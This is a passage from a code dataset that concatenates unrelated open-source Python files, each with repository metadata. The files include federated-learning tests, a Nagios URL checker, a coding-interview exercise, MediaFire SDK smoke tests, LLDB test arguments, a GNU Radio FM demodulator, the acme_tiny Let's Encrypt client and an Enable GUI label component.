self.assertAllClose(output.measurements, expected_measurements)
@parameterized.named_parameters(
("float_tensor", _test_float_tensor_type))
def test_correctness_different_clients(self, value_type):
factory = one_bit_sgd.OneBitSGDFactory(2.)
value_type = tff.to_type(value_type)
process = factory.create(value_type)
state = process.initialize()
client_values = [[-1.0, 1.0, 2.0], [1.0, 1.0, 1.0]]
expected_result = [1.0, 1.0, 3.0]
bitstring_length = tf.size(expected_result, out_type=tf.float32) + 64.
expected_avg_bitrate = bitstring_length / tf.size(expected_result,
out_type=tf.float32)
expected_measurements = collections.OrderedDict(
avg_bitrate=expected_avg_bitrate,
avg_distortion=2./6.)
output = process.next(state, client_values)
self.assertAllClose(output.result, expected_result)
self.assertAllClose(output.measurements, expected_measurements)
if __name__ == "__main__":
tff.test.main()
|
google-research/federated
|
compressed_communication/aggregators/comparison_methods/one_bit_sgd_test.py
|
Python
|
apache-2.0
| 8,373 | 0.00203 |
#!/usr/bin/python
import sys
import requests
try:
url = sys.argv[1]
r = requests.get('http://%s' %url ,timeout=3)
except requests.exceptions.Timeout:
print 'url timeout\n%s' %url
sys.exit(2)
except:
print 'url error \n%s' %url
sys.exit(2)
url_status = r.status_code
if url_status == 200:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(0)
else:
print 'url_status %s\n%s' %(url_status,url)
sys.exit(2)
|
XiaJieCom/change
|
document/Service/nagios/nrpe/check_url.py
|
Python
|
lgpl-2.1
| 489 | 0.03272 |
# CTCI 1.3
# URLify
import unittest
# My Solution
#-------------------------------------------------------------------------------
# CTCI Solution
def urlify(string, length):
'''function replaces single spaces with %20 and removes trailing spaces'''
new_index = len(string)
for i in reversed(range(length)):
if string[i] == ' ':
# Replace spaces
string[new_index - 3:new_index] = '%20'
new_index -= 3
else:
# Move characters
string[new_index - 1] = string[i]
new_index -= 1
return string
#-------------------------------------------------------------------------------
#Testing
class Test(unittest.TestCase):
'''Test Cases'''
# Using lists because Python strings are immutable
data = [
(list('much ado about nothing '), 22,
list('much%20ado%20about%20nothing')),
(list('Mr John Smith '), 13, list('Mr%20John%20Smith'))]
def test_urlify(self):
for [test_string, length, expected] in self.data:
actual = urlify(test_string, length)
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
|
kyle8998/Practice-Coding-Questions
|
CTCI/Chapter1/1.3-URLify.py
|
Python
|
unlicense
| 1,208 | 0.005795 |
# System imports
import os
from os.path import join
import pytest
from git import *
from PyGitUp.git_wrapper import RebaseError
from PyGitUp.tests import basepath, write_file, init_master, update_file, testfile_name
test_name = 'rebase_error'
repo_path = join(basepath, test_name + os.sep)
def setup():
master_path, master = init_master(test_name)
# Prepare master repo
master.git.checkout(b=test_name)
# Clone to test repo
path = join(basepath, test_name)
master.clone(path, b=test_name)
repo = Repo(path, odbt=GitCmdObjectDB)
assert repo.working_dir == path
# Modify file in master
update_file(master, test_name)
# Modify file in our repo
contents = 'completely changed!'
repo_file = join(path, testfile_name)
write_file(repo_file, contents)
repo.index.add([repo_file])
repo.index.commit(test_name)
# Modify file in master
update_file(master, test_name)
def test_rebase_error():
""" Run 'git up' with a failing rebase """
os.chdir(repo_path)
from PyGitUp.gitup import GitUp
gitup = GitUp(testing=True)
with pytest.raises(RebaseError):
gitup.run()
|
msiemens/PyGitUp
|
PyGitUp/tests/test_rebase_error.py
|
Python
|
mit
| 1,166 | 0.001715 |
#!/usr/bin/env python
#! -*- coding: utf-8 -*-
from gi.repository import Cld
from gi.repository import DcsCore as dc
from gi.repository import DcsUI as du
from gi.repository import Gtk
class DcsExample(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="DCS Example")
config = Cld.XmlConfig.with_file_name("examples/cld.xml")
self.context = Cld.Context.from_config(config)
self.chan = self.context.get_object("ai0")
self.dev = self.context.get_object("dev0")
self.dev.open()
if(not self.dev.is_open):
print "Open device " + self.dev.id + " failed"
#self.task = self.context.get_object("tk0")
#self.task.run()
self.aictl = du.AIControl("/ai0")
self.aictl.connect("request_object", self.offer)
self.add(self.aictl)
def offer(self, widget):
widget.offer_cld_object(self.chan)
win = DcsExample()
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
|
open-dcs/dcs
|
examples/python/ui.py
|
Python
|
mit
| 1,007 | 0.004965 |
#!/usr/bin/python
import io
import os
import unittest
import logging
import uuid
from mediafire import MediaFireApi, MediaFireUploader, UploadSession
from mediafire.uploader import UPLOAD_SIMPLE_LIMIT_BYTES
APP_ID = '42511'
MEDIAFIRE_EMAIL = os.environ.get('MEDIAFIRE_EMAIL')
MEDIAFIRE_PASSWORD = os.environ.get('MEDIAFIRE_PASSWORD')
class MediaFireSmokeBaseTestCase(object):
"""Smoke tests for API"""
class BaseTest(unittest.TestCase):
def setUp(self):
# Reset logging to info to avoid leaking credentials
logger = logging.getLogger('mediafire.api')
logger.setLevel(logging.INFO)
self.api = MediaFireApi()
session = self.api.user_get_session_token(
app_id=APP_ID, email=MEDIAFIRE_EMAIL,
password=MEDIAFIRE_PASSWORD)
self.api.session = session
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeSimpleTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Simple tests"""
def test_user_get_info(self):
result = self.api.user_get_info()
self.assertEqual(result["user_info"]["display_name"],
u"Coalmine Smoketest")
@unittest.skipIf('CI' not in os.environ, "Running outside CI environment")
class MediaFireSmokeWithDirectoryTest(MediaFireSmokeBaseTestCase.BaseTest):
"""Smoke tests requiring temporary directory"""
def setUp(self):
super(MediaFireSmokeWithDirectoryTest, self).setUp()
folder_uuid = str(uuid.uuid4())
result = self.api.folder_create(foldername=folder_uuid)
self.folder_key = result["folder_key"]
def tearDown(self):
self.api.folder_purge(self.folder_key)
def test_upload_small(self):
"""Test simple upload"""
# make sure we most likely will get upload/simple
data = b'This is a tiny file content: ' + os.urandom(32)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'smallfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/simple')
def test_upload_large(self):
"""Test large file upload"""
# make sure we will get upload/resumable, prefix + 4MiB
data = b'Long line is long: ' + os.urandom(UPLOAD_SIMPLE_LIMIT_BYTES)
fd = io.BytesIO(data)
uploader = MediaFireUploader(self.api)
with UploadSession(self.api):
result = uploader.upload(fd, 'bigfile.txt',
folder_key=self.folder_key)
self.assertIsNotNone(result.quickkey)
self.assertEqual(result.action, 'upload/resumable')
if __name__ == "__main__":
unittest.main()
|
MediaFire/mediafire-python-open-sdk
|
tests/test_smoke.py
|
Python
|
bsd-2-clause
| 2,879 | 0.000347 |
from __future__ import print_function
from __future__ import absolute_import
# System modules
import argparse
import sys
import multiprocessing
import os
import textwrap
# Third-party modules
# LLDB modules
from . import configuration
class ArgParseNamespace(object):
pass
def parse_args(parser, argv):
""" Returns an argument object. LLDB_TEST_ARGUMENTS environment variable can
be used to pass additional arguments.
"""
args = ArgParseNamespace()
if ('LLDB_TEST_ARGUMENTS' in os.environ):
print(
"Arguments passed through environment: '%s'" %
os.environ['LLDB_TEST_ARGUMENTS'])
args = parser.parse_args([sys.argv[0]].__add__(
os.environ['LLDB_TEST_ARGUMENTS'].split()), namespace=args)
return parser.parse_args(args=argv, namespace=args)
def default_thread_count():
# Check if specified in the environment
num_threads_str = os.environ.get("LLDB_TEST_THREADS")
if num_threads_str:
return int(num_threads_str)
else:
return multiprocessing.cpu_count()
def create_parser():
parser = argparse.ArgumentParser(
description='description',
prefix_chars='+-',
add_help=False)
group = None
# Helper function for boolean options (group will point to the current
# group when executing X)
X = lambda optstr, helpstr, **kwargs: group.add_argument(
optstr, help=helpstr, action='store_true', **kwargs)
group = parser.add_argument_group('Help')
group.add_argument(
'-h',
'--help',
dest='h',
action='store_true',
help="Print this help message and exit. Add '-v' for more detailed help.")
# C and Python toolchain options
group = parser.add_argument_group('Toolchain options')
group.add_argument(
'-A',
'--arch',
metavar='arch',
dest='arch',
help=textwrap.dedent('''Specify the architecture(s) to test. This option can be specified more than once'''))
group.add_argument('-C', '--compiler', metavar='compiler', dest='compiler', help=textwrap.dedent(
'''Specify the compiler(s) used to build the inferior executables. The compiler path can be an executable basename or a full path to a compiler executable. This option can be specified multiple times.'''))
if sys.platform == 'darwin':
group.add_argument('--apple-sdk', metavar='apple_sdk', dest='apple_sdk', default="macosx", help=textwrap.dedent(
'''Specify the name of the Apple SDK (macosx, macosx.internal, iphoneos, iphoneos.internal, or path to SDK) and use the appropriate tools from that SDK's toolchain.'''))
# FIXME? This won't work for different extra flags according to each arch.
group.add_argument(
'-E',
metavar='extra-flags',
help=textwrap.dedent('''Specify the extra flags to be passed to the toolchain when building the inferior programs to be debugged
suggestions: do not lump the "-A arch1 -A arch2" together such that the -E option applies to only one of the architectures'''))
group.add_argument('--dsymutil', metavar='dsymutil', dest='dsymutil', help=textwrap.dedent('Specify which dsymutil to use.'))
# Test filtering options
group = parser.add_argument_group('Test filtering options')
group.add_argument(
'-f',
metavar='filterspec',
action='append',
help='Specify a filter, which consists of the test class name, a dot, followed by the test method, to only admit such test into the test suite') # FIXME: Example?
X('-l', "Don't skip long running tests")
group.add_argument(
'-p',
metavar='pattern',
help='Specify a regexp filename pattern for inclusion in the test suite')
group.add_argument('--excluded', metavar='exclusion-file', action='append', help=textwrap.dedent(
'''Specify a file for tests to exclude. File should contain lists of regular expressions for test files or methods,
with each list under a matching header (xfail files, xfail methods, skip files, skip methods)'''))
group.add_argument(
'-G',
'--category',
metavar='category',
action='append',
dest='categoriesList',
help=textwrap.dedent('''Specify categories of test cases of interest. Can be specified more than once.'''))
group.add_argument(
'--skip-category',
metavar='category',
action='append',
dest='skipCategories',
help=textwrap.dedent('''Specify categories of test cases to skip. Takes precedence over -G. Can be specified more than once.'''))
# Configuration options
group = parser.add_argument_group('Configuration options')
group.add_argument(
'--framework',
metavar='framework-path',
help='The path to LLDB.framework')
group.add_argument(
'--executable',
metavar='executable-path',
help='The path to the lldb executable')
group.add_argument(
'--server',
metavar='server-path',
help='The path to the debug server executable to use')
group.add_argument(
'--out-of-tree-debugserver',
dest='out_of_tree_debugserver',
action='store_true',
help='A flag to indicate an out-of-tree debug server is being used')
group.add_argument(
'-s',
metavar='name',
help='Specify the name of the dir created to store the session files of tests with errored or failed status. If not specified, the test driver uses the timestamp as the session dir name')
group.add_argument(
'-S',
'--session-file-format',
default=configuration.session_file_format,
metavar='format',
help='Specify session file name format. See configuration.py for a description.')
group.add_argument(
'-y',
type=int,
metavar='count',
help="Specify the iteration count used to collect our benchmarks. An example is the number of times to do 'thread step-over' to measure stepping speed.")
group.add_argument(
'-#',
type=int,
metavar='sharp',
dest='sharp',
help='Repeat the test suite for a specified number of times')
group.add_argument('--channel', metavar='channel', dest='channels', action='append', help=textwrap.dedent(
"Specify the log channels (and optional categories) e.g. 'lldb all' or 'gdb-remote packets' if no categories are specified, 'default' is used"))
group.add_argument(
'--log-success',
dest='log_success',
action='store_true',
help="Leave logs/traces even for successful test runs (useful for creating reference log files during debugging.)")
group.add_argument(
'--codesign-identity',
metavar='Codesigning identity',
default='lldb_codesign',
help='The codesigning identity to use')
group.add_argument(
'--build-dir',
dest='test_build_dir',
metavar='Test build directory',
default='lldb-test-build.noindex',
help='The root build directory for the tests. It will be removed before running.')
# Configuration options
group = parser.add_argument_group('Remote platform options')
group.add_argument(
'--platform-name',
dest='lldb_platform_name',
metavar='platform-name',
help='The name of a remote platform to use')
group.add_argument(
'--platform-url',
dest='lldb_platform_url',
metavar='platform-url',
help='A LLDB platform URL to use when connecting to a remote platform to run the test suite')
group.add_argument(
'--platform-working-dir',
dest='lldb_platform_working_dir',
metavar='platform-working-dir',
help='The directory to use on the remote platform.')
# Test-suite behaviour
group = parser.add_argument_group('Runtime behaviour options')
X('-d', 'Suspend the process after launch to wait indefinitely for a debugger to attach')
X('-q', "Don't print extra output from this script.")
X('-t', 'Turn on tracing of lldb command and other detailed test executions')
group.add_argument(
'-u',
dest='unset_env_varnames',
metavar='variable',
action='append',
help='Specify an environment variable to unset before running the test cases. e.g., -u DYLD_INSERT_LIBRARIES -u MallocScribble')
group.add_argument(
'--env',
dest='set_env_vars',
metavar='variable',
action='append',
help='Specify an environment variable to set to the given value before running the test cases e.g.: --env CXXFLAGS=-O3 --env DYLD_INSERT_LIBRARIES')
X('-v', 'Do verbose mode of unittest framework (print out each test case invocation)')
group.add_argument(
'--enable-crash-dialog',
dest='disable_crash_dialog',
action='store_false',
help='(Windows only) When LLDB crashes, display the Windows crash dialog.')
group.set_defaults(disable_crash_dialog=True)
group = parser.add_argument_group('Parallel execution options')
group.add_argument(
'--inferior',
action='store_true',
help=('specify this invocation is a multiprocess inferior, '
'used internally'))
group.add_argument(
'--no-multiprocess',
action='store_true',
help='skip running the multiprocess test runner')
group.add_argument(
'--threads',
type=int,
dest='num_threads',
default=default_thread_count(),
help=('The number of threads/processes to use when running tests '
'separately, defaults to the number of CPU cores available'))
group.add_argument(
'--test-subdir',
action='store',
help='Specify a test subdirectory to use relative to the test root dir'
)
group.add_argument(
'--test-runner-name',
action='store',
help=('Specify a test runner strategy. Valid values: multiprocessing,'
' multiprocessing-pool, serial, threading, threading-pool')
)
# Test results support.
group = parser.add_argument_group('Test results options')
group.add_argument(
'--curses',
action='store_true',
help='Shortcut for specifying test results using the curses formatter')
group.add_argument(
'--results-file',
action='store',
help=('Specifies the file where test results will be written '
'according to the results-formatter class used'))
group.add_argument(
'--results-port',
action='store',
type=int,
help=('Specifies the localhost port to which the results '
'formatted output should be sent'))
group.add_argument(
'--results-formatter',
action='store',
help=('Specifies the full package/module/class name used to translate '
'test events into some kind of meaningful report, written to '
'the designated output results file-like object'))
group.add_argument(
'--results-formatter-option',
'-O',
action='append',
dest='results_formatter_options',
help=('Specify an option to pass to the formatter. '
'Use --results-formatter-option="--option1=val1" '
'syntax. Note the "=" is critical, don\'t include whitespace.'))
group.add_argument(
'--event-add-entries',
action='store',
help=('Specify comma-separated KEY=VAL entries to add key and value '
'pairs to all test events generated by this test run. VAL may '
'be specified as VAL:TYPE, where TYPE may be int to convert '
'the value to an int'))
# Re-run related arguments
group = parser.add_argument_group('Test Re-run Options')
group.add_argument(
'--rerun-all-issues',
action='store_true',
help=('Re-run all issues that occurred during the test run '
'irrespective of the test method\'s marking as flakey. '
'Default behavior is to apply re-runs only to flakey '
'tests that generate issues.'))
group.add_argument(
'--rerun-max-file-threshold',
action='store',
type=int,
default=50,
help=('Maximum number of files requiring a rerun beyond '
'which the rerun will not occur. This is meant to '
'stop a catastrophically failing test suite from forcing '
'all tests to be rerun in the single-worker phase.'))
# Remove the reference to our helper function
del X
group = parser.add_argument_group('Test directories')
group.add_argument(
'args',
metavar='test-dir',
nargs='*',
help='Specify a list of directory names to search for test modules named after Test*.py (test discovery). If empty, search from the current working directory instead.')
return parser
|
youtube/cobalt
|
third_party/llvm-project/lldb/packages/Python/lldbsuite/test/dotest_args.py
|
Python
|
bsd-3-clause
| 13,110 | 0.002517 |
#!/usr/bin/env python
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr
from gnuradio import blocks
from gnuradio import filter
from gnuradio import analog
from gnuradio import audio
from gnuradio.filter import firdes
from gnuradio.fft import window
import sys, math
# Create a top_block
class build_graph(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
input_rate = 200e3 # rate of a broadcast FM station
audio_rate = 44.1e3 # Rate we send the signal to the speaker
# resample from the output of the demodulator to the rate of
# the audio sink.
resamp_rate = audio_rate / input_rate
# use a file as a dummy source. Replace this with a real radio
# receiver to capture signals over-the-air.
src = blocks.file_source(gr.sizeof_gr_complex, "dummy.dat", True)
# Set the demodulator using the same deviation as the receiver.
max_dev = 75e3
fm_demod_gain = input_rate / (2*math.pi*max_dev/8.0)
fm_demod = analog.quadrature_demod_cf(fm_demod_gain)
# Create a filter for the resampler and filter the audio
# signal to 15 kHz. The nfilts is the number of filters in the
# arbitrary resampler. It logically operates at a rate of
# nfilts*input_rate, so we make those adjustments when
# building the filter.
volume = 0.20
nfilts = 32
resamp_taps = firdes.low_pass_2(volume*nfilts, # gain
nfilts*input_rate, # sampling rate
15e3, # low pass cutoff freq
1e3, # width of trans. band
60, # stop band attenuaton
window.WIN_KAISER)
# Build the resampler and filter
resamp_filter = filter.pfb_arb_resampler_fff(resamp_rate,
resamp_taps, nfilts)
# sound card as final sink You may have to add a specific
# device name as a second argument here, something like
# "pulse" if using pulse audio or "plughw:0,0".
audio_sink = audio.sink(int(audio_rate))
# now wire it all together
self.connect(src, fm_demod)
self.connect(fm_demod, resamp_filter)
self.connect(resamp_filter, (audio_sink,0))
def main(args):
tb = build_graph()
tb.start() # fork thread and return
input('Press Enter to quit: ')
tb.stop()
if __name__ == '__main__':
main(sys.argv[1:])
|
mbr0wn/gnuradio
|
gr-analog/examples/fm_demod.py
|
Python
|
gpl-3.0
| 2,750 | 0.003273 |
from atlas_web import app
app.run(debug=True)
|
RDCEP/atlas-viewer
|
run.py
|
Python
|
apache-2.0
| 45 | 0.022222 |
#!/usr/bin/env python
import argparse, subprocess, json, os, sys, base64, binascii, time, hashlib, re, copy, textwrap, logging
try:
from urllib.request import urlopen # Python 3
except ImportError:
from urllib2 import urlopen # Python 2
#DEFAULT_CA = "https://acme-staging.api.letsencrypt.org"
DEFAULT_CA = "https://acme-v01.api.letsencrypt.org"
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.StreamHandler())
LOGGER.setLevel(logging.INFO)
def get_crt(account_key, csr, acme_dir, log=LOGGER, CA=DEFAULT_CA):
# helper function base64 encode for jose spec
def _b64(b):
return base64.urlsafe_b64encode(b).decode('utf8').replace("=", "")
# parse account key to get public key
log.info("Parsing account key...")
proc = subprocess.Popen(["openssl", "rsa", "-in", account_key, "-noout", "-text"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
pub_hex, pub_exp = re.search(
r"modulus:\n\s+00:([a-f0-9\:\s]+?)\npublicExponent: ([0-9]+)",
out.decode('utf8'), re.MULTILINE|re.DOTALL).groups()
pub_exp = "{0:x}".format(int(pub_exp))
pub_exp = "0{0}".format(pub_exp) if len(pub_exp) % 2 else pub_exp
header = {
"alg": "RS256",
"jwk": {
"e": _b64(binascii.unhexlify(pub_exp)),
"kty": "RSA",
"n": _b64(binascii.unhexlify(re.sub(r"(\s|:)", "", pub_hex))),
},
}
accountkey_json = json.dumps(header['jwk'], sort_keys=True, separators=(',', ':'))
thumbprint = _b64(hashlib.sha256(accountkey_json.encode('utf8')).digest())
# helper function make signed requests
def _send_signed_request(url, payload):
payload64 = _b64(json.dumps(payload).encode('utf8'))
protected = copy.deepcopy(header)
protected["nonce"] = urlopen(CA + "/directory").headers['Replay-Nonce']
protected64 = _b64(json.dumps(protected).encode('utf8'))
proc = subprocess.Popen(["openssl", "dgst", "-sha256", "-sign", account_key],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate("{0}.{1}".format(protected64, payload64).encode('utf8'))
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
data = json.dumps({
"header": header, "protected": protected64,
"payload": payload64, "signature": _b64(out),
})
try:
resp = urlopen(url, data.encode('utf8'))
return resp.getcode(), resp.read()
except IOError as e:
return e.code, e.read()
# find domains
log.info("Parsing CSR...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-noout", "-text"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("Error loading {0}: {1}".format(csr, err))
domains = set([])
common_name = re.search(r"Subject:.*? CN=([^\s,;/]+)", out.decode('utf8'))
if common_name is not None:
domains.add(common_name.group(1))
subject_alt_names = re.search(r"X509v3 Subject Alternative Name: \n +([^\n]+)\n", out.decode('utf8'), re.MULTILINE|re.DOTALL)
if subject_alt_names is not None:
for san in subject_alt_names.group(1).split(", "):
if san.startswith("DNS:"):
domains.add(san[4:])
# get the certificate domains and expiration
log.info("Registering account...")
code, result = _send_signed_request(CA + "/acme/new-reg", {
"resource": "new-reg",
"agreement": "https://letsencrypt.org/documents/LE-SA-v1.0.1-July-27-2015.pdf",
})
if code == 201:
log.info("Registered!")
elif code == 409:
log.info("Already registered!")
else:
raise ValueError("Error registering: {0} {1}".format(code, result))
# verify each domain
for domain in domains:
log.info("Verifying {0}...".format(domain))
# get new challenge
code, result = _send_signed_request(CA + "/acme/new-authz", {
"resource": "new-authz",
"identifier": {"type": "dns", "value": domain},
})
if code != 201:
raise ValueError("Error requesting challenges: {0} {1}".format(code, result))
# make the challenge file
challenge = [c for c in json.loads(result.decode('utf8'))['challenges'] if c['type'] == "http-01"][0]
token = re.sub(r"[^A-Za-z0-9_\-]", "_", challenge['token'])
keyauthorization = "{0}.{1}".format(token, thumbprint)
wellknown_path = os.path.join(acme_dir, token)
with open(wellknown_path, "w") as wellknown_file:
wellknown_file.write(keyauthorization)
# check that the file is in place
wellknown_url = "http://{0}/.well-known/acme-challenge/{1}".format(domain, token)
try:
resp = urlopen(wellknown_url)
resp_data = resp.read().decode('utf8').strip()
assert resp_data == keyauthorization
except (IOError, AssertionError):
os.remove(wellknown_path)
raise ValueError("Wrote file to {0}, but couldn't download {1}".format(
wellknown_path, wellknown_url))
# notify challenge are met
code, result = _send_signed_request(challenge['uri'], {
"resource": "challenge",
"keyAuthorization": keyauthorization,
})
if code != 202:
raise ValueError("Error triggering challenge: {0} {1}".format(code, result))
# wait for challenge to be verified
while True:
try:
resp = urlopen(challenge['uri'])
challenge_status = json.loads(resp.read().decode('utf8'))
except IOError as e:
raise ValueError("Error checking challenge: {0} {1}".format(
e.code, json.loads(e.read().decode('utf8'))))
if challenge_status['status'] == "pending":
time.sleep(2)
elif challenge_status['status'] == "valid":
log.info("{0} verified!".format(domain))
os.remove(wellknown_path)
break
else:
raise ValueError("{0} challenge did not pass: {1}".format(
domain, challenge_status))
# get the new certificate
log.info("Signing certificate...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-outform", "DER"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
csr_der, err = proc.communicate()
code, result = _send_signed_request(CA + "/acme/new-cert", {
"resource": "new-cert",
"csr": _b64(csr_der),
})
if code != 201:
raise ValueError("Error signing certificate: {0} {1}".format(code, result))
# return signed certificate!
log.info("Certificate signed!")
return """-----BEGIN CERTIFICATE-----\n{0}\n-----END CERTIFICATE-----\n""".format(
"\n".join(textwrap.wrap(base64.b64encode(result).decode('utf8'), 64)))
def main(argv):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""\
This script automates the process of getting a signed TLS certificate from
Let's Encrypt using the ACME protocol. It will need to be run on your server
and have access to your private account key, so PLEASE READ THROUGH IT! It's
only ~200 lines, so it won't take long.
===Example Usage===
python acme_tiny.py --account-key ./account.key --csr ./domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > signed.crt
===================
===Example Crontab Renewal (once per month)===
0 0 1 * * python /path/to/acme_tiny.py --account-key /path/to/account.key --csr /path/to/domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > /path/to/signed.crt 2>> /var/log/acme_tiny.log
==============================================
""")
)
parser.add_argument("--account-key", required=True, help="path to your Let's Encrypt account private key")
parser.add_argument("--csr", required=True, help="path to your certificate signing request")
parser.add_argument("--acme-dir", required=True, help="path to the .well-known/acme-challenge/ directory")
parser.add_argument("--quiet", action="store_const", const=logging.ERROR, help="suppress output except for errors")
parser.add_argument("--ca", default=DEFAULT_CA, help="certificate authority, default is Let's Encrypt")
args = parser.parse_args(argv)
LOGGER.setLevel(args.quiet or LOGGER.level)
signed_crt = get_crt(args.account_key, args.csr, args.acme_dir, log=LOGGER, CA=args.ca)
sys.stdout.write(signed_crt)
if __name__ == "__main__": # pragma: no cover
main(sys.argv[1:])
|
FuzzyHobbit/acme-tiny
|
acme_tiny.py
|
Python
|
mit
| 9,077 | 0.004407 |
#-------------------------------------------------------------------------------
#
# Define standard Enable 'control' components, like text/image labels,
# push buttons, radio buttons, check boxes, and so on.
#
# Written by: David C. Morrill
#
# Date: 10/10/2003
#
# (c) Copyright 2003 by Enthought, Inc.
#
# Classes defined: Label
# RadioButton
# CheckBox
#
#-------------------------------------------------------------------------------
from __future__ import with_statement
# Major library imports
import os.path
# Enthought library imports
from enable.colors import ColorTrait
from traits.api import Bool, Delegate, HasTraits, Str, Trait, \
TraitPrefixList
from traitsui.api import View, Group
# Local relative imports
from component import Component
from base import LEFT, RIGHT, TOP, BOTTOM, HCENTER, VCENTER, EMBOSSED, ENGRAVED, \
transparent_color, xy_in_bounds, add_rectangles
from enable_traits import spacing_trait, padding_trait, margin_trait,\
border_size_trait, image_trait
from enable_traits import position_trait, font_trait, engraving_trait
from radio_group import RadioStyle, RadioGroup
#-------------------------------------------------------------------------------
# Constants:
#-------------------------------------------------------------------------------
empty_text_info = ( 0, 0, 0, 0 )
LEFT_OR_RIGHT = LEFT | RIGHT
TOP_OR_BOTTOM = TOP | BOTTOM
orientation_trait = Trait( 'text', TraitPrefixList( [ 'text', 'component' ] ) )
class LabelTraits ( HasTraits ):
text = Str
font = font_trait
text_position = position_trait("left")
color = ColorTrait("black")
shadow_color = ColorTrait("white")
style = engraving_trait
image = image_trait
image_position = position_trait("left")
image_orientation = orientation_trait
spacing_height = spacing_trait
spacing_width = spacing_trait
padding_left = padding_trait
padding_right = padding_trait
padding_top = padding_trait
padding_bottom = padding_trait
margin_left = margin_trait
margin_right = margin_trait
margin_top = margin_trait
margin_bottom = margin_trait
border_size = border_size_trait
border_color = ColorTrait("black")
bg_color = ColorTrait("clear")
enabled = Bool(True)
selected = Bool(False)
#---------------------------------------------------------------------------
# Trait view definitions:
#---------------------------------------------------------------------------
traits_view = View(
Group( 'enabled', 'selected',
id = 'component' ),
Group( 'text', ' ',
'font', ' ',
'color', ' ',
'shadow_color', ' ',
'style',
id = 'text',
style = 'custom' ),
Group( 'bg_color{Background Color}', '_',
'border_color', '_',
'border_size',
id = 'border',
style = 'custom' ),
Group( 'text_position', '_',
'image_position', '_',
'image_orientation', ' ',
'image',
id = 'position',
style = 'custom' ),
Group( 'spacing_height', 'spacing_width', '_',
'padding_left', 'padding_right',
'padding_top', 'padding_bottom', '_',
'margin_left', 'margin_right',
'margin_top', 'margin_bottom',
id = 'margin' )
)
default_label_traits = LabelTraits()
#-------------------------------------------------------------------------------
# 'Label' class:
#-------------------------------------------------------------------------------
LabelTraitDelegate = Delegate( 'delegate', redraw = True )
LayoutLabelTraitDelegate = LabelTraitDelegate( layout = True )
LabelContentDelegate = LayoutLabelTraitDelegate( content = True )
class Label ( Component ):
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
delegate = Trait( default_label_traits )
text = LabelContentDelegate
font = LabelContentDelegate
text_position = LayoutLabelTraitDelegate
color = LabelTraitDelegate
shadow_color = LabelTraitDelegate
style = LabelTraitDelegate
image = LayoutLabelTraitDelegate
image_position = LayoutLabelTraitDelegate
image_orientation = LayoutLabelTraitDelegate
spacing_height = LayoutLabelTraitDelegate
spacing_width = LayoutLabelTraitDelegate
padding_left = LayoutLabelTraitDelegate
padding_right = LayoutLabelTraitDelegate
padding_top = LayoutLabelTraitDelegate
padding_bottom = LayoutLabelTraitDelegate
margin_left = LayoutLabelTraitDelegate
margin_right = LayoutLabelTraitDelegate
margin_top = LayoutLabelTraitDelegate
margin_bottom = LayoutLabelTraitDelegate
border_size = LayoutLabelTraitDelegate
border_color = LabelTraitDelegate
bg_color = LabelTraitDelegate
enabled = LabelTraitDelegate
selected = LabelTraitDelegate
#---------------------------------------------------------------------------
# Trait view definitions:
#---------------------------------------------------------------------------
traits_view = View(
Group( '<component>', 'enabled', 'selected',
id = 'component' ),
Group( '<links>', 'delegate',
id = 'links' ),
Group( 'text', ' ',
'font', ' ',
'color', ' ',
'shadow_color', ' ',
'style',
id = 'text',
style = 'custom' ),
Group( 'bg_color{Background Color}', '_',
'border_color', '_',
'border_size',
id = 'border',
style = 'custom' ),
Group( 'text_position', '_',
'image_position', '_',
'image_orientation', ' ',
'image',
id = 'position',
style = 'custom' ),
Group( 'spacing_height', 'spacing_width', '_',
'padding_left', 'padding_right',
'padding_top', 'padding_bottom', '_',
'margin_left', 'margin_right',
'margin_top', 'margin_bottom',
id = 'margin' )
)
colorchip_map = {
'fg_color': 'color',
'bg_color': 'bg_color',
'shadow_color': 'shadow_color',
'alt_color': 'border_color'
}
#---------------------------------------------------------------------------
# Initialize the object:
#---------------------------------------------------------------------------
def __init__ ( self, text = '', **traits ):
self.text = text
Component.__init__( self, **traits )
#---------------------------------------------------------------------------
# Handle any trait being modified:
#---------------------------------------------------------------------------
def _anytrait_changed ( self, name, old, new ):
trait = self.trait( name )
if trait.content:
self.update_text()
if trait.redraw:
if trait.layout:
self.layout()
self.redraw()
#---------------------------------------------------------------------------
# Return the components that contain a specified (x,y) point:
#---------------------------------------------------------------------------
def _components_at ( self, x, y ):
if self._in_margins( x, y ):
return [ self ]
return []
#---------------------------------------------------------------------------
# Return whether not a specified point is inside the component margins:
#---------------------------------------------------------------------------
def _in_margins ( self, x, y ):
ml = self.margin_left
mb = self.margin_bottom
return xy_in_bounds( x, y, add_rectangles(
self.bounds,
( ml, mb, -(self.margin_right + ml), -(self.margin_top + mb) ) ) )
#---------------------------------------------------------------------------
# Update any information related to the text content of the control:
